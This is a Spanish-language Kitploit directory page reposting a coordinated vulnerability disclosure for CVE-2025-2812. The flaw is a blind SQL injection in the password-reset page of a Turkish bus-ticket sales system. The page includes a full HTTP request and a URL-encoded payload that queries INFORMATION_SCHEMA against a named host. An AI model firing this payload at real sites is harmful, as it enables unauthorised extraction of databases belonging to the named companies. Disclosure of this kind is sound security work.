Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-2812 — CVE-2025-2812 Inyección SQL | Kitploit
Herramientas/GitHubGitHub/sahici/cve-2025-2812
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónSeguridad de Bases de Datos
GitHubsahici/cve-2025-2812

CVE-2025-2812

CVE-2025-2812 Inyección SQL

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

CVE-2025-2812 — Vulnerabilidad de inyección SQL en "Bilet Satış Otomasyonu" de Mydata Bilişim Ltd. Şti

📌 CVE-ID: CVE-2025-2812
📢 Aviso USOM: tr-25-0099
🛡️ Tipo de vulnerabilidad: CWE-89 - SQL Injection (Boolean-based Blind)
🏢 Producto afectado: Bilet Satış Otomasyonu – Mydata Bilişim Ltd. Şti
🌐 URL de destino de ejemplo: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php


🔍 Resumen de la vulnerabilidad

En el producto "Bilet Satış Otomasyonu", se ha detectado una vulnerabilidad de inyección SQL ciega basada en booleanos (Boolean-based Blind SQL Injection) en el parámetro "Adınızın ilk harfi" (ilkHarf) de la página de restablecimiento de contraseña (SifremiUnuttum.php). Esta vulnerabilidad permite extraer datos del sistema sin necesidad de nombre de usuario ni contraseña.

Esta vulnerabilidad afecta a los sistemas de las siguientes empresas de autobuses:

  • Balıkesir Uludağ
  • Kontur
  • Efe Tur
  • Kale Seyahat
  • +20 empresas

💥 PoC (Proof of Concept)

📌 HTTP Request:

root@kitploit:~
GET /otobus-bileti/SifremiUnuttumBilgi.php?TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW HTTP/1.1
Host: otobusfirmasi.com.tr
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
Cookie: PHPSESSID=***************

🧪 Payload utilizado:

root@kitploit:~
TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW

🧠 Detalles técnicos

  • Parámetro vulnerable: ilkHarf
  • Método: Boolean-based Blind SQLi
  • Tipo de vulnerabilidad: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

🙏 Agradecimientos

Tras la vulnerabilidad que detectamos en el producto "Bilet Satış Otomasyonu" desarrollado por "Mydata Bilişim Ltd. Şti", esta falla, anunciada con el código CVE-2025-2812, fue declarada en coordinación con el fabricante y USOM. Nos enorgullece contribuir a la comunidad de ciberseguridad en este proceso.

Tras la notificación de la vulnerabilidad, Mydata Bilişim Ltd. Şti aplicó rápidamente todos los procedimientos necesarios, cerró la falla de seguridad correspondiente e integró medidas de seguridad adicionales en sus sistemas. Agradecemos su transparencia, cooperación y sentido de responsabilidad durante el proceso.

Nos enorgullece contribuir a la comunidad de ciberseguridad en este proceso.


📬 Contacto

Puede contactarme para cualquier tipo de pregunta, comentario o colaboración:

  • 📧 Correo electrónico: [email protected]
  • 📷 Instagram: @yyasar.yasin

Descargar herramienta